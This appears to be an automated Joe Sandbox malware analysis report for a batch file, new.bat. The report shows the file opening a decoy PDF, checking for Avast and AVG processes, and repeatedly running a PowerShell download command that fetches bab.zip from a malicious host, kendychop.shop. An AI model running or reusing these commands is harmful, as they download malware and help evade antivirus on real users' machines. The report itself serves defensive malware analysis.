Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new.bat

Overview

General Information

Sample name:new.bat
Analysis ID:1554787
MD5:f5cedb5682cb997b731bde5f07b13315
SHA1:b5468b547b0f65a7a154e2c1dcafc0b54187117e
SHA256:af17483ec56816e1aa02ba3ed28609742b6390912ba9d73e78790c602e1ce0a3
Tags:batuser-pr0xylife
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64
  • cmd.exe (PID: 6140 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 6532 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5168 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7288 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1716,i,7911197355517073219,1355922153495788486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 5676 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • tasklist.exe (PID: 2084 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 5160 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • tasklist.exe (PID: 5712 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 4544 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • powershell.exe (PID: 1404 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 8176 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 5160 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 1404, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 1404, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 1404, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5160, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://kendychop.shop:8930/FTSP.zipmGAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/cam.zipAvira URL Cloud: Label: malware
Source: http://kendychop.shop:8930/bab.zipz7Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/startupppp.batAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zipC5Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zipY4Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/FTSP.zipb7Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zipAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zipVAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/FTSP.zip&Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/FTSP.zipAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zip87dba6fAvira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/FTSP.zipHOMEDRIVE=C:HOMEPATH=Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zip%Avira URL Cloud: Label: phishing
Source: http://kendychop.shop:8930/bab.zip&Avira URL Cloud: Label: phishing
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 2.23.197.184 2.23.197.184
Source: Joe Sandbox ViewIP Address: 93.184.221.240 93.184.221.240
Source: svchost.exe, 0000000B.00000002.3381905452.000001D5E2A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: edb.log.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930
Source: powershell.exe, 00000013.00000002.3365123668.0000023867429000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmp, new.batString found in binary or memory: http://kendychop.shop:8930/FTSP.zip
Source: powershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/FTSP.zip&
Source: powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3367553406.0000023868ED3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 00000009.00000002.2715117663.000001F942ABF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/FTSP.zipb7
Source: powershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/FTSP.zipmG
Source: powershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869B80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3367087321.0000023867670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmp, new.batString found in binary or memory: http://kendychop.shop:8930/bab.zip
Source: powershell.exe, 00000009.00000002.2715117663.000001F942AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zip%
Source: powershell.exe, 00000013.00000002.3365123668.0000023867429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zip&
Source: powershell.exe, 00000009.00000002.2753024037.000001F95CE30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zip87dba6f
Source: powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zipC5
Source: powershell.exe, 00000013.00000002.3370047735.0000023869BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zipV
Source: powershell.exe, 00000013.00000002.3367087321.0000023867674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zipY4
Source: powershell.exe, 00000009.00000002.2715117663.000001F942ABF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kendychop.shop:8930/bab.zipz7
Source: new.batString found in binary or memory: http://kendychop.shop:8930/cam.zip
Source: new.batString found in binary or memory: http://kendychop.shop:8930/startupppp.bat
Source: powershell.exe, 00000009.00000002.2749316891.000001F954DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.2715733190.000001F944C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.2715733190.000001F944C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3295035435.0000023800001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000B.00000003.2168082474.000001D5E2910000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000009.00000002.2715733190.000001F944E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.3370047735.0000023869BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000009.00000002.2749316891.000001F954DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2749316891.000001F954CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: classification engineClassification label: mal56.winBAT@33/63@0/10
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 16-12-05-445.logJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1716,i,7911197355517073219,1355922153495788486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1716,i,7911197355517073219,1355922153495788486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
